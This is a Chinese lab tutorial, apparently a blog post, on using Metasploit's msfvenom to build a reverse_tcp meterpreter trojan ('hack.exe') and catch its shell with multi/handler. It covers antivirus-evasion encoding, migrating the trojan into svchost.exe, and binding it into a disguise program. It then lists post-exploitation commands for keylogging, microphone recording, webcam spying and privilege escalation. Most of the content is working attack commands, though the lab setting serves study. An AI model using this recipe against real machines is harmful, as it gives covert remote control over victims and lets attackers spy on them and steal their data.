MSF生成远控木马

发布时间 2023-11-12 23:30:58作者: 白云之东

实验环境:

靶机Windows server 2003   192.168.242.129

攻击机kali  192.168.242.131

实验工具:Metasploit Framework(MSF)

实验过程:

确定攻击机和靶机之间连通性

 

利用msfvenom生成远控木马

msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,配合meterpreter在本地监听上线。

可以使用msfvenom -h查看所有参数

 常用参数

–p (--payload-options):                                添加载荷payload。
    --lhost:监听的地址
    --lport:监听的端口
–a:                                                    选择架构平台  x86 、x64 、 x86_64
    --platform:                                        选择平台,windows、Linux
–e:                                                    使用编码进行免杀,如使用 x86/shikata_ga_nai 编码
–i:                                                    编码的次数
–b:                                                    避免使用的字符 例如:不使用 '\x00\'。
PrependMigrate=true PrependMigrateProc=svchost.exe:    使这个木马默认会迁移到 svchost.exe 进程
–f :                                                   输出文件格式,如 exe、c、elf、macho、raw、asp、aspx、
–l:                                                    查看所有payload encoder nops。
–o:                                                    文件输出
–s:                                                    生成payload的最大长度,就是文件大小。
–c:                                                    添加自己的shellcode
–x | -k:                                               捆绑,可以指定捆绑的程序进行伪装;

使用msfvenom生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.242.131 lport=4444 -f exe -o hack.exe     #lhost是攻击机的主机ip,lport是攻击机的用于监听的端口

 成功生成hack.exe木马程序

使用MSF监听木马反弹过来的shell

msfconsole  //启动
​
use exploit/multi/handler  //开启监听 
​
set payload windows/meterpreter/reverse_tcp  //设置payload,选择漏洞利用模块,跟生成木马的payload对应
​
set lhost 192.168.242.131  //本地IP,即攻击IP
​
set lport 4444  //监听端口
​
exploit   //攻击

启动msfconsole,并配置好payload

 想办法把hack.exe放到靶机上运行(木马复制到靶机,或者开启http服务下载木马都可以)

MSF执行exploit,靶机执行木马程序

 成功监听到shell,可以控制目标服务器

 常用命令

getuid      查看当前权限
getsystem   尝试获取system权限
shell       获取当前权限shell会话
ps          列出正在运行的进程
pkill       按名称终止进程
kill        按PID终止进程
reboot      重启
shutdown    关机
upload      上传文件(格式参考:upload /root/1.txt -> d:/)
download    下载文件(格式参考:download c:/1.txt -> /root/)
keyboard_send   令对方键盘输入(参考格式:keyboard_send ilovecc)
#请按以下顺序执行
keyscan_start   开始捕获击键(开始键盘记录)
keyscan_dump    转储按键缓冲(下载键盘记录)
keyscan_stop    停止捕获击键(停止键盘记录)
#操作完都会有文件保存在服务器,一般是存在/root目录下,msf会提示具体位置和名称,提到本机就可打开看
record_mic      麦克风录制(格式参考:record_mic -d 13)
screenshot      截图截取对方目前桌面的截图
webcam_snap     摄像头拍摄一张照片
webcam_stream   持续监控摄像头

参考链接:
MSF生成木马实现远控 - ʚɞ无恙 - 博客园 (cnblogs.com)
【精选】msf-Msfvenonm生成后门木马-CSDN博客